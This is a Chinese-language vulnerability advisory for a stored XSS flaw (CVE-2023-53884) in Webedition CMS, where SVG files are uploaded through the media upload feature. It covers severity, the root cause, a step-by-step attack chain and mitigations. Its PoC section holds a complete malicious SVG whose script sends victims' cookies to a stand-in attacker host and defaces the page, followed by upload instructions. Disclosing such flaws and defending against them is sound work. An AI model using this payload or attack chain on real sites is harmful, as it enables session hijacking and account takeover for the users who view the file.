CVE-2023-53884: Webedition CMS SVG文件上传存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53884

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Webedition CMS v2.9.8.8

漏洞概述

Webedition CMS v2.9.8.8版本存在一个严重的存储型跨站脚本(XSS)漏洞。该漏洞允许经过身份验证的低权限用户通过系统的媒体上传功能上传包含恶意JavaScript代码的SVG文件。由于SVG文件在存储后会被其他用户访问，当受害者查看这些恶意的SVG文件时，嵌入其中的JavaScript代码会在受害者浏览器上下文中执行，从而实现会话劫持、敏感信息窃取、钓鱼攻击等恶意操作。攻击者利用该漏洞可以获取受害者的认证Cookie、劫持用户会话、修改页面内容或重定向用户到恶意网站。由于该漏洞属于存储型XSS，恶意代码会持久存在于服务器上，影响所有访问该SVG文件的用户。CVSS 3.1评分5.4分，中危级别，攻击复杂度低，但需要用户交互和低权限认证即可实施攻击。

技术细节

该漏洞的根本原因在于Webedition CMS的媒体上传功能对SVG文件类型缺乏有效的安全过滤和内容清理机制。SVG(可缩放矢量图形)是一种基于XML的矢量图形格式，支持内嵌JavaScript代码。攻击者利用这一特性，可以构造包含恶意JavaScript的SVG文件并通过系统的文件上传接口将其存储到服务器上。当其他用户通过浏览器访问这些SVG文件时，浏览器会解析SVG内容并执行其中的JavaScript代码。由于浏览器在执行SVG内嵌脚本时遵循同源策略的某些宽松规则，攻击者可以绕过部分安全限制实现跨站脚本攻击。攻击者首先需要获取Webedition CMS的低权限账户，然后访问媒体上传功能上传精心构造的SVG文件。上传的SVG文件会被存储在服务器的可访问目录下，文件名可能保持原始名称或被系统重命名。最终，当受害者访问该SVG文件的URL时，恶意JavaScript代码会在受害者浏览器中执行。防御措施包括对上传的SVG文件进行内容清理和脚本移除、实施严格的内容安全策略(CSP)、限制SVG文件的上传权限以及对SVG文件进行安全渲染隔离。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用Webedition CMS，版本为v2.9.8.8或存在该漏洞的版本

STEP 2

步骤2: 账户获取

攻击者获取Webedition CMS的低权限用户账户（通过默认凭据、弱密码、社工或其他方式）

STEP 3

步骤3: 构造恶意SVG

攻击者创建包含恶意JavaScript代码的SVG文件，用于窃取Cookie、劫持会话或执行其他恶意操作

STEP 4

步骤4: 文件上传

使用获取的账户登录CMS，通过媒体上传功能将恶意SVG文件上传到服务器

STEP 5

步骤5: 等待受害者访问

恶意SVG文件被存储在服务器上，等待其他用户访问该文件URL

STEP 6

步骤6: XSS执行

当受害者（其他用户或管理员）通过浏览器访问该SVG文件时，嵌入的JavaScript代码在受害者浏览器上下文中执行

STEP 7

步骤7: 数据窃取/会话劫持

攻击者通过XSS执行获取受害者的认证Cookie、会话令牌或其他敏感信息，进而劫持用户账户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Malicious SVG file for CVE-2023-53884 PoC -->
<!-- This PoC demonstrates stored XSS via SVG upload in Webedition CMS -->

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script type="text/javascript">
    // Steal session cookies and send to attacker server
    var cookies = document.cookie;
    var attacker_server = "https://attacker.example.com/steal?data=" + encodeURIComponent(cookies);
    
    // Create image element to exfiltrate data
    var img = new Image();
    img.src = attacker_server;
    
    // Display alert for PoC demonstration
    alert('XSS Executed - CVE-2023-53884\nCookie: ' + cookies);
    
    // Additional payload: DOM manipulation
    document.body.innerHTML = '<h1>Malicious SVG Executed</h1><p>Your session has been compromised.</p>';
  </script>
  
  <!-- Visual element to make SVG appear legitimate -->
  <rect width="300" height="200" fill="#f0f0f0" stroke="#333" stroke-width="2"/>
  <text x="150" y="100" text-anchor="middle" font-family="Arial" font-size="16" fill="#333">
    Malicious SVG File
  </text>
</svg>

<!-- Usage: -->
<!-- 1. Obtain low-privilege account on Webedition CMS -->
<!-- 2. Navigate to media upload functionality -->
<!-- 3. Upload this SVG file -->
<!-- 4. When other users view the SVG, the JavaScript executes -->
<!-- 5. Attacker receives victim's cookies via the defined endpoint -->

影响范围

Webedition CMS v2.9.8.8

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 临时禁用SVG文件上传功能或限制为可信用户；2) 对所有上传的SVG文件进行内容清理，移除<script>标签和事件处理器属性；3) 配置Web服务器对SVG文件进行强制下载而非直接在浏览器中渲染；4) 实施严格的访问控制，限制媒体文件的访问权限；5) 增强用户认证机制，使用多因素认证；6) 监控和审计文件上传行为，及时发现异常上传活动；7) 考虑使用Web应用防火墙(WAF)规则拦截恶意SVG文件上传请求。